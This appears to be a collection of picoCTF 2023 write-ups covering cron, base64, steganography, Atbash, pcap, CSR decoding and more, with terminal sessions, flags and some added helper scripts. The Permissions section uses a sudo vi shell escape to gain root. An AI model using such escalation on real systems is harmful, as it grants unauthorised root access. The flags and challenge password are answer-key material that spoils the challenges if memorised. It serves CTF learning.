picoCTF2023

chrono 

100 points 

Tags: General Skills, linux 

AUTHOR: MUBARAK MIKAIL 

Description 

How to automate tasks to run at intervals on linux servers? 

Additional details will be available after launching your challenge instance. 

 

 

picoCTF{Sch3DUL7NG_T45K3_L1NUX_abe2c490} 

 

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ ssh picoplayer@saturn.picoctf.net -p 64468 

 

picoplayer@challenge:~$ crontab -e 

no crontab for picoplayer - using an empty one 

update-alternatives: error: no alternatives for editor 

/usr/bin/sensible-editor: 25: editor: not found 

/usr/bin/sensible-editor: 28: nano: not found 

/usr/bin/sensible-editor: 31: nano-tiny: not found 

/usr/bin/sensible-editor: 34: vi: not found 

Couldn't find an editor! 

Set the $EDITOR environment variable to your desired editor. 

crontab: "/usr/bin/sensible-editor" exited with status 1 

picoplayer@challenge:~$ sudo crontab -e 

[sudo] password for picoplayer:  

picoplayer is not in the sudoers file.  This incident will be reported. 

picoplayer@challenge:~$ cd /etc 

picoplayer@challenge:/etc$ cat crontab 

# picoCTF{Sch3DUL7NG_T45K3_L1NUX_abe2c490} 

 


findme 

100 points 

Tags: Web Exploitation 

AUTHOR: GEOFFREY NJOGU 

Description 

Help us test the form by submitting the username as test and password as test! 

Additional details will be available after launching your challenge instance. 

 

 

picoCTF{proxies_all_the_way_599a80c2} 

 

Go to the site, follow the instructions.  

Poked around the site, but could not find anything. 

 

Use the browser's Developer Tools to capture the traffic from the first page through to the successful login. You will see two entries with no response: 

http://saturn.picoctf.net:56021/next-page/id=cGljb0NURntwcm94aWVzX2Fs 

http://saturn.picoctf.net:56021/next-page/id=bF90aGVfd2F5XzU5OWE4MGMyfQ==  

 

The id values look base64-encoded. Decode these two id values and you get the flag. 
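The decoding step as a small triage script (an added example, not part of the original write-up). It pulls every path segment or `key=value` value out of the captured URLs and keeps those that decode from base64 to printable ASCII; the function names and the minimum-length heuristic are assumptions made for this example.

```python
import base64
from urllib.parse import urlsplit

# The two request URLs quoted in the write-up above.
URLS = [
    "http://saturn.picoctf.net:56021/next-page/id=cGljb0NURntwcm94aWVzX2Fs",
    "http://saturn.picoctf.net:56021/next-page/id=bF90aGVfd2F5XzU5OWE4MGMyfQ==",
]

def candidate_values(url):
    """Yield path segments and query items, keeping only the part after 'key='."""
    parts = urlsplit(url)
    for seg in parts.path.split("/") + parts.query.split("&"):
        key, sep, value = seg.partition("=")
        yield value if sep else key

def decode_token(tok, min_len=8):
    """Return printable ASCII if tok is base64 or base64url, else None."""
    core = tok.rstrip("=").replace("-", "+").replace("_", "/")
    # Short strings and lengths of 1 mod 4 cannot be base64.
    if len(core) < min_len or len(core) % 4 == 1:
        return None
    try:
        raw = base64.b64decode(core + "=" * (-len(core) % 4), validate=True)
        text = raw.decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return text if text.isprintable() else None

def decoded_fragments(urls):
    """Decode every base64-looking value, in request order."""
    return [t for u in urls for v in candidate_values(u) if (t := decode_token(v))]

if __name__ == "__main__":
    # Joining the fragments in request order gives the full string.
    print("".join(decoded_fragments(URLS)))
```

The same check works on URLs exported from a proxy or web server log, where base64 in a path or parameter is a common place for data to be passed in plain sight.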


hideme 

100 points 

Tags: Forensics, steganography 

AUTHOR: GEOFFREY NJOGU 

Description 

Every file gets a flag. The SOC analyst saw one image being sent back and forth between two people. They decided to investigate and found out that there was more than what meets the eye here.

 
 

 

picoCTF{Hidding_An_imag3_within_@n_ima9e_c31884c7} 

 

 

Try an online tool first. 

https://aperisolve.fr/  

 

It looks like binwalk found a hidden file. 

 

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ binwalk flag.png   

  

DECIMAL   HEXADECIMAL DESCRIPTION 

-------------------------------------------------------------------------------- 

0         0x0         PNG image, 512 x 504, 8-bit/color RGBA, non-interlaced 

41        0x29            Zlib compressed data, compressed 

39739     0x9B3B      Zip archive data, at least v1.0 to extract, name: secret/ 

39804     0x9B7C      Zip archive data, at least v2.0 to extract, compressed size: 2832, uncompressed size: 2984, name: secret/flag.png 

42871     0xA777      End of Zip archive, footer length: 22 

  

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ binwalk -e flag.png 

  

DECIMAL   HEXADECIMAL DESCRIPTION 

-------------------------------------------------------------------------------- 

0         0x0         PNG image, 512 x 504, 8-bit/color RGBA, non-interlaced 

41        0x29            Zlib compressed data, compressed 

39739     0x9B3B      Zip archive data, at least v1.0 to extract, name: secret/ 

39804     0x9B7C      Zip archive data, at least v2.0 to extract, compressed size: 2832, uncompressed size: 2984, name: secret/flag.png 

42871     0xA777      End of Zip archive, footer length: 22 

  

                                                                                                                      

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ ls 

aaa.txt  atbash.jpg  encrypted.txt  flag.png  _flag.png.extracted 

                                                                                                                      

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ cd _flag.png.extracted  

                                                                                                                      

┌──(kali㉿kali)-[~/Desktop/picoCTF/_flag.png.extracted] 

└─$ ls 

29  29.zlib  9B3B.zip  secret 

 

┌──(kali㉿kali)-[~/Desktop/picoCTF/_flag.png.extracted] 

└─$ cd secret              

        

 

┌──(kali㉿kali)-[~/Desktop/picoCTF/_flag.png.extracted/secret] 

└─$ ls 

flag.png 

        

 

 


HideToSee 

100 points 

Tags: Cryptography 

AUTHOR: SUNDAY JACOB NWANYIM 

Description 

How about some hide and seek heh? Look at this image here.

 
 

picoCTF{atbash_crack_6c4bcb08} 

 

 

Tried online tool: 

https://aperisolve.fr/  

Online steg site with all the tools together 

 

It has strings, exiftool and some others. The simple ones didn't work. 

 

Try steghide. 

 

Try password atbash with steghide and it does not work. 

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ steghide info atbash.jpg       

"atbash.jpg": 

  format: jpeg 

  capacity: 2.4 KB 

Try to get information about embedded data ? (y/n) y 

Enter passphrase:  

steghide: could not extract any data with that passphrase! 

                                                                                                      

Try without a passphrase (just press Enter) and it works. 

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ steghide info atbash.jpg 

"atbash.jpg": 

  format: jpeg 

  capacity: 2.4 KB 

Try to get information about embedded data ? (y/n) y 

Enter passphrase:  

  embedded file "encrypted.txt": 

size: 31.0 Byte 

encrypted: rijndael-128, cbc 

compressed: yes 

                                                                                                                      

                                                                   

Extract the file without a passphrase. 

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ steghide extract -sf  atbash.jpg 

Enter passphrase:  

wrote extracted data to "encrypted.txt". 

                                                                                                                      

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ cat encrypted.txt                           

krxlXGU{zgyzhs_xizxp_6x4yxy08} 

 

Notice the image says atbash. So decode this string with atbash decoder: 

picoCTF{atbash_crack_6c4bcb08} 
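The Atbash step in code, as an added example that is not part of the original write-up. It goes slightly beyond the text: besides the Atbash mapping it also tries every Caesar shift and uses the known `picoCTF{` prefix to decide which keyless substitution was applied. The function names are assumptions of this example.

```python
import string

LOWER, UPPER = string.ascii_lowercase, string.ascii_uppercase
ATBASH = str.maketrans(LOWER + UPPER, LOWER[::-1] + UPPER[::-1])

CIPHERTEXT = "krxlXGU{zgyzhs_xizxp_6x4yxy08}"  # contents of encrypted.txt above

def atbash(text):
    """Mirror each letter within its alphabet (a<->z, b<->y, ...).

    Digits and punctuation pass through unchanged. The mapping is its own
    inverse, so the same function encodes and decodes.
    """
    return text.translate(ATBASH)

def rot(text, n):
    """Caesar shift by n letters, included only to contrast with Atbash."""
    table = str.maketrans(LOWER + UPPER,
                          LOWER[n:] + LOWER[:n] + UPPER[n:] + UPPER[:n])
    return text.translate(table)

def identify(ciphertext, known_prefix="picoCTF{"):
    """Return every keyless letter substitution that yields the known prefix."""
    candidates = [("atbash", atbash(ciphertext))]
    candidates += [("rot%d" % n, rot(ciphertext, n)) for n in range(1, 26)]
    return [(name, pt) for name, pt in candidates if pt.startswith(known_prefix)]

if __name__ == "__main__":
    for name, plaintext in identify(CIPHERTEXT):
        print(name, plaintext)
```

None of these transforms has a key, so they only obscure text; the rijndael-128 encryption steghide reported also protected nothing here because the passphrase was empty.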

 


MatchTheRegex 

100 points 

Tags: Web Exploitation 

AUTHOR: SUNDAY JACOB NWANYIM 

Description 

How about trying to match a regular expression? The website is running here.

 

 

picoCTF{succ3ssfully_matchtheregex_18b306a0} 

 

 

First, try searching with ***; this gives an error. 

Then try searching with picoCTF***, and it works.


money-ware 

100 points 

Tags:  

Author: Juni19 

Description 

Flag format: picoCTF{Malwarename} The first letter of the malware name should be capitalized and the rest lowercase. Your friend just got hacked and has been asked to pay some bitcoins to 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. He doesn’t seem to understand what is going on and asks you for advice. Can you identify what malware he’s being a victim of? 

 

Just google 

"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX malware" 

You will find news that points to a malware named Petya. 

 

picoCTF{Petya} 


PcapPoisoning 

100 points 

Tags: Forensics, pcap 

AUTHOR: MUBARAK MIKAIL 

Description 

How about some hide and seek heh? Download this file and find the flag. 

 

 

Open the file in Wireshark. 

Search for the keyword pico and you will find it. 

 

 

 

picoCTF{P64P_4N4L7S1S_SU55355FUL_ba1a6097} 

 

 


Permissions 

100 points 

Tags: General Skills, vim 

AUTHOR: GEOFFREY NJOGU 

Description 

Can you read files in the root file? 

The system admin has provisioned an account for you on the main server: 

ssh -p 58850 picoplayer@saturn.picoctf.net 

Password: cbjrrAIyO4 

Can you login and read the root file? 

 

┌──(kali㉿kali)-[~/Desktop/picoCTF] 

└─$ ssh -p 58850 picoplayer@saturn.picoctf.net 

The authenticity of host '[saturn.picoctf.net]:58850 ([3.12.65.157]:58850)' can't be established. 

ED25519 key fingerprint is SHA256:oCgGxVpfRH0kgCbgMYs6D+4eE2zVsDCCjmEzmEiK2iQ. 

This key is not known by any other names 

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 

Warning: Permanently added '[saturn.picoctf.net]:58850' (ED25519) to the list of known hosts. 

picoplayer@saturn.picoctf.net's password:  

picoplayer@challenge:~$ cd /root 

-bash: cd: /root: Permission denied 

picoplayer@challenge:~$ whoami 

picoplayer 

picoplayer@challenge:~$ sudo -i 

[sudo] password for picoplayer:  

Sorry, user picoplayer is not allowed to execute '/bin/bash' as root on challenge. 

picoplayer@challenge:~$ sudo -l 

[sudo] password for picoplayer:  

Matching Defaults entries for picoplayer on challenge: 

    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 

  

User picoplayer may run the following commands on challenge: 

(ALL) /usr/bin/vi 

 

First see if you can use vi to open the flag.txt file under /root. 

 

picoplayer@challenge:~$ vi /root/flag.txt 

picoplayer@challenge:~$ sudo vi /root/flag.txt 

Nothing showed up. 

 

Since vi can be run with sudo, check which command can be used to get a root shell from vi: 

https://gtfobins.github.io/gtfobins/vi/#sudo  

  

 

 

picoplayer@challenge:~$ sudo vi -c ':!/bin/sh' /dev/null 

 

# cd /root 

# ls 

flag.txt 

# cat flag.txt 

# ls -al 

total 16 

drwx------ 1 root root   38 Mar 15 08:17 . 

drwxr-xr-x 1 root root   63 Mar 15 08:14 .. 

-rw-r--r-- 1 root root 3106 Dec  5  2019 .bashrc 

-rw-r--r-- 1 root root   35 Mar 15 02:46 .flag.txt 

-rw-r--r-- 1 root root  161 Dec  5  2019 .profile 

-rw------- 1 root root  707 Mar 15 08:17 .viminfo 

-rw-r--r-- 1 root root 0 Mar 15 08:17 flag.txt 

# cat .flag.txt 

picoCTF{uS1ng_v1m_3dit0r_27f6a05a} 

#  
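The root cause here is the sudo rule shown by `sudo -l`: an editor that can run shell commands was granted as root. The audit below is an added example, not part of the original write-up. It parses `sudo -l` output and flags rules that grant such programs; the program list is illustrative rather than exhaustive, and the last two sample rules are constructed for contrast.

```python
import os
import re

# Illustrative, not exhaustive: programs that can start a shell or run
# arbitrary commands once running, so a sudo grant on them amounts to root.
SHELL_CAPABLE = {"vi", "vim", "view", "nano", "less", "more", "man",
                 "awk", "find", "env", "python", "python3", "perl", "bash", "sh"}

# "(runas) [TAG: ...] command[, command ...]" as printed by sudo -l.
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?:[A-Z_]+:\s*)*(?P<cmds>.+)$")

SAMPLE = """\
Matching Defaults entries for picoplayer on challenge:
    env_reset, mail_badpass
User picoplayer may run the following commands on challenge:
    (ALL) /usr/bin/vi
    (root) NOPASSWD: /usr/bin/systemctl status nginx
    (root) sudoedit /etc/motd
"""  # first rule is from the session above; the other two are constructed

def audit_sudo_l(output):
    """Return (runas, command, reason) for each risky rule in sudo -l output."""
    findings = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True       # everything before this is Defaults text
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            if cmd == "ALL":
                findings.append((m.group("runas"), cmd, "unrestricted"))
            elif os.path.basename(cmd.split()[0]) in SHELL_CAPABLE:
                findings.append((m.group("runas"), cmd, "shell-capable program"))
    return findings

if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE):
        print(finding)
```

Where the intent is to let a user edit one file, a `sudoedit /path/to/file` rule is the safer grant, because the editor then runs as the invoking user rather than as root.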

 


ReadMyCert 

100 points 

Tags: Cryptography 

AUTHOR: SUNDAY JACOB NWANYIM 

Description 

How about we take you on an adventure on exploring certificate signing requests? Take a look at this CSR file here.

 

 

Download the CSR file and run it through a base64 decoder; just decoding the file is enough to get the flag. If you want to read all the contents, try a CSR decoder such as https://www.sslshopper.com/csr-decoder.html. The flag is the common name of the cert. 

 

picoCTF{read_mycert_12eba7f1}